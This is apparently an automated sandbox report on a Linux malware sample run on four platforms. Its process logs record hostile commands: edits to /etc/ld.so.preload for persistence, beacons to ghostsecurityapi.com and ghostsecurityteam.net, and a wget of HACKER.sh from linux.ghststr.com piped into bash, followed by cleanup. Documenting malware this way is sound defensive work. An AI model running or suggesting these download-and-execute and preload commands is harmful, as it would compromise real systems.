Malware Analysis Report

2025-01-23 15:27

Sample ID 240417-tsdvzafb67
Target f62d2741ab07c859c2036988259d0b45_JaffaCakes118
SHA256 03f504de2e804c515de12411e431085f509a593c5ec8e512adb0641eed87f287
Tags
antivm persistence
score
9/10


Analysis Overview

score
9/10

SHA256

03f504de2e804c515de12411e431085f509a593c5ec8e512adb0641eed87f287

Threat Level: Likely malicious

The file f62d2741ab07c859c2036988259d0b45_JaffaCakes118 was found to be: Likely malicious.

Malicious Activity Summary

antivm persistence

Modifies the dynamic linker configuration file

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-17 16:18

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-17 16:18

Reported

2024-04-17 16:21

Platform

debian9-armhf-20240226-en

Max time kernel

13s

Max time network

17s

Command Line

[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]

Signatures

Modifies the dynamic linker configuration file

persistence
Description Indicator Process Target
File opened for modification /etc/ld.so.preload /tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/self/fd N/A N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.8xapVZ /usr/bin/apt-get N/A
File opened for modification /tmp/.../t.sh /usr/bin/wget N/A
File opened for modification /tmp/fileutl.message.rBaWlO /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.GXSL7N /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.Yq9DyS /usr/bin/apt-get N/A

Processes

/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118

[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]

/bin/sed

[sed -En s/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p]

/usr/bin/apt-get

[apt-get install curl -y]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/curl

[curl https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]

/usr/bin/wget

[wget -q https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]

/usr/bin/curl

[curl https://ghostsecurityteam.net/1/ -o /dev/null]

/usr/bin/wget

[wget https://ghostsecurityteam.net/1/ -O /dev/null]

/usr/bin/curl

[curl https://ghostsecurityteam.net/2/ -o /dev/null]

/usr/bin/wget

[wget https://ghostsecurityteam.net/2/ -O /dev/null]

/bin/mkdir

[mkdir ...]

/usr/bin/wget

[wget --quiet http://linux.ghststr.com/LLLOL/HACKER.sh -O t.sh]

/bin/bash

[bash t.sh]

/bin/rm

[rm -rf /tmp/...]

Network

Country Destination Domain Proto
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 linux.ghststr.com udp
US 1.1.1.1:53 linux.ghststr.com udp

Files

/root/.bash_history

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-17 16:18

Reported

2024-04-17 16:21

Platform

debian9-mipsbe-20240226-en

Max time kernel

14s

Max time network

16s

Command Line

[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]

Signatures

Modifies the dynamic linker configuration file

persistence
Description Indicator Process Target
File opened for modification /etc/ld.so.preload /tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118 N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/self/fd N/A N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.2IC6wm /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.Qzd0iI /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.SRY9a9 /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.SudRtB /usr/bin/apt-get N/A
File opened for modification /tmp/.../t.sh /usr/bin/wget N/A

Processes

/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118

[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]

/bin/sed

[sed -En s/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p]

/usr/bin/apt-get

[apt-get install curl -y]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/curl

[curl https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]

/usr/bin/wget

[wget -q https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]

/usr/bin/curl

[curl https://ghostsecurityteam.net/1/ -o /dev/null]

/usr/bin/wget

[wget https://ghostsecurityteam.net/1/ -O /dev/null]

/usr/bin/curl

[curl https://ghostsecurityteam.net/2/ -o /dev/null]

/usr/bin/wget

[wget https://ghostsecurityteam.net/2/ -O /dev/null]

/bin/mkdir

[mkdir ...]

/usr/bin/wget

[wget --quiet http://linux.ghststr.com/LLLOL/HACKER.sh -O t.sh]

/bin/bash

[bash t.sh]

/bin/rm

[rm -rf /tmp/...]

Network

Country Destination Domain Proto
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 linux.ghststr.com udp
US 1.1.1.1:53 linux.ghststr.com udp

Files

/root/.bash_history

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral4

Detonation Overview

Submitted

2024-04-17 16:18

Reported

2024-04-17 16:21

Platform

debian9-mipsel-20240226-en

Max time kernel

19s

Max time network

20s

Command Line

[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]

Signatures

Modifies the dynamic linker configuration file

persistence
Description Indicator Process Target
File opened for modification /etc/ld.so.preload /tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118 N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/self/fd N/A N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.../t.sh /usr/bin/wget N/A
File opened for modification /tmp/fileutl.message.SCA3Ao /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.SgW38J /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.4AOdCe /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.GaCaCK /usr/bin/apt-get N/A

Processes

/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118

[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]

/bin/sed

[sed -En s/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p]

/usr/bin/apt-get

[apt-get install curl -y]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/curl

[curl https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]

/usr/bin/wget

[wget -q https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]

/usr/bin/curl

[curl https://ghostsecurityteam.net/1/ -o /dev/null]

/usr/bin/wget

[wget https://ghostsecurityteam.net/1/ -O /dev/null]

/usr/bin/curl

[curl https://ghostsecurityteam.net/2/ -o /dev/null]

/usr/bin/wget

[wget https://ghostsecurityteam.net/2/ -O /dev/null]

/bin/mkdir

[mkdir ...]

/usr/bin/wget

[wget --quiet http://linux.ghststr.com/LLLOL/HACKER.sh -O t.sh]

/bin/bash

[bash t.sh]

/bin/rm

[rm -rf /tmp/...]

Network

Country Destination Domain Proto
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 linux.ghststr.com udp
US 1.1.1.1:53 linux.ghststr.com udp

Files

/root/.bash_history

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-17 16:18

Reported

2024-04-17 16:21

Platform

ubuntu1804-amd64-20240226-en

Max time kernel

6s

Max time network

135s

Command Line

[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]

Signatures

Modifies the dynamic linker configuration file

persistence
Description Indicator Process Target
File opened for modification /etc/ld.so.preload /tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118 N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/self/fd N/A N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.jPHFPi /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.WW6N6L /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.PfjOK0 /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.z8f0Jt /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.aZrqJ7 /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.x1ShXA /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.jwg07S /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.J8dblm /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.VOjKzP /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.Bn7ROW /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.imb1Wp /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.jbUkxE /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.bMS5sx /usr/bin/apt-get N/A
File opened for modification /tmp/.../t.sh /usr/bin/wget N/A
File opened for modification /tmp/fileutl.message.MgHAgI /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.7yNJnb /usr/bin/apt-get N/A
File opened for modification /tmp/fileutl.message.5jSxc4 /usr/bin/apt-get N/A

Processes

/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118

[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]

/bin/sed

[sed -En s/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p]

/usr/bin/apt-get

[apt-get install curl -y]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/curl

[curl https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]

/usr/bin/wget

[wget -q https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]

/usr/bin/curl

[curl https://ghostsecurityteam.net/1/ -o /dev/null]

/usr/bin/wget

[wget https://ghostsecurityteam.net/1/ -O /dev/null]

/usr/bin/curl

[curl https://ghostsecurityteam.net/2/ -o /dev/null]

/usr/bin/wget

[wget https://ghostsecurityteam.net/2/ -O /dev/null]

/bin/mkdir

[mkdir ...]

/usr/bin/wget

[wget --quiet http://linux.ghststr.com/LLLOL/HACKER.sh -O t.sh]

/bin/bash

[bash t.sh]

/bin/rm

[rm -rf /tmp/...]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 1.1.1.1:53 ghostsecurityapi.com udp
US 151.101.130.49:443 tcp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 ghostsecurityteam.net udp
US 1.1.1.1:53 linux.ghststr.com udp
US 1.1.1.1:53 linux.ghststr.com udp
US 151.101.65.91:443 tcp
GB 195.181.164.14:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 1.1.1.1:53 cdn.fwupd.org udp
US 1.1.1.1:53 cdn.fwupd.org udp
US 151.101.194.49:443 cdn.fwupd.org tcp
US 151.101.65.91:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.5:443 1527653184.rsc.cdn77.org tcp

Files

/tmp/fileutl.message.z8f0Jt

MD5 373fe2f2ef99005d2550a482f09a3e51
SHA1 68e6572b55b1e77f7d171ebac7b2579b7a6bd51d
SHA256 7552d5ab0c3879756a860aaab8e7c2f8ffb9409ea9ff9e65fc046ba5c519ebe5
SHA512 def9e854b824d2fddc6a15f898be73cfb679ac38563f5af854546f49c9d5d2316a40176dc41d6b360bda7b65de53863a53e4eedadf6336000b031b77a113607b

/root/.bash_history

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09